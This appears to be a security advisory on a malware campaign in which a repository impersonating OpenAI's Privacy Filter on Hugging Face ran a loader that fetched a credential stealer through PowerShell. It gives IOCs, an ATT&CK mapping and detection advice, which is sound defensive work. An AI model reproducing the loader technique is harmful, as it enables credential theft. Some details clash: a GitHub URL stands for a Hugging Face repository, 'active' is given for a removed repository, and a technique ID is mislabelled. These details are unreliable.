Fake OpenAI Privacy Filter Malware Campaign Reaches 244K Downloads on Hugging Face Before Removal
Date: 2026-06-12
Tags: supply-chain, malware
Executive Summary
A fraudulent AI model posing as an OpenAI release briefly became one of the most downloaded projects on Hugging Face before researchers determined it was distributing credential-stealing malware to Windows systems. Before its removal, the repository accumulated roughly 244,000 downloads and hundreds of positive ratings in less than a day, reaching the top of Hugging Face's trending rankings. Some of the infrastructure tied to the attack overlaps with activity previously associated with ValleyRAT, a remote access trojan linked by researchers to the China-aligned threat group known as Silver Fox.
Campaign Summary
| Field | Detail |
|---|---|
| Campaign / Malware | Fake OpenAI Privacy Filter Campaign |
| Attribution | Suspected China-aligned (Silver Fox connection via infrastructure) (confidence: medium) |
| Target | Developers downloading AI models from Hugging Face |
| Vector | Malicious Hugging Face repository with typosquatting/impersonation |
| Status | active |
| First Observed | 2026-05-07 |
Detailed Findings
The repository, named Open-OSS/privacy-filter, impersonated OpenAI's legitimate Privacy Filter release, copied its model card almost word-for-word, and included a malicious loader.py file that fetched and executed credential-stealing malware on Windows hosts. The loader.py script first executes decoy code that resembles a legitimate AI model loader before launching a concealed infection chain. The script disabled SSL verification, decoded a base64-encoded URL linked to the public JSON hosting service jsonkeeper.com, retrieved a remote payload instruction, and passed commands to PowerShell. HiddenLayer identified six additional Hugging Face repositories uploaded under a separate account that used nearly identical loader logic and shared infrastructure with the campaign.
MITRE ATT&CK Mapping
| Technique | ID | Context |
|---|---|---|
| Supply Chain Compromise | T1195 | Malicious AI model repository uploaded to public platform |
| Credential Access | T1110 | Infostealer malware payload harvests system credentials |
| Execution | T1059.003 | PowerShell commands executed by malicious loader |
IOCs
Domains
jsonkeeper.comFull URL Paths
https://github.com/Open-OSS/privacy-filterSplunk Format
"jsonkeeper.com" OR "https://github.com/Open-OSS/privacy-filter"Package Indicators
Open-OSS/privacy-filterDetection Recommendations
Monitor Hugging Face repository uploads for model cards that closely mimic legitimate vendor releases; implement code signature analysis on Python loader files in downloaded models; track C2 infrastructure patterns (jsonkeeper.com and similar dynamic C2 hosts); deploy endpoint detection on PowerShell execution from model loading workflows; validate model integrity via cryptographic signing before importing.
References
- [HiddenLayer] Malicious Hugging Face Model Masquerading as OpenAI Release (2026-05-11) — https://securityboulevard.com/2026/05/attackers-use-fake-openai-model-to-push-credential-stealing-malware/
- [CSO Online] Malicious Hugging Face model masquerading as OpenAI release hits 244K downloads (2026-05-11) — https://www.csoonline.com/article/4169407/malicious-hugging-face-model-masquerading-as-openai-release-hits-244k-downloads.html
- [Hive Security] Poisoned AI: How Hugging Face Became a Malware Distribution Platform (2026-05-15) — https://hivesecurity.gitlab.io/blog/huggingface-ai-supply-chain-attacks-2026/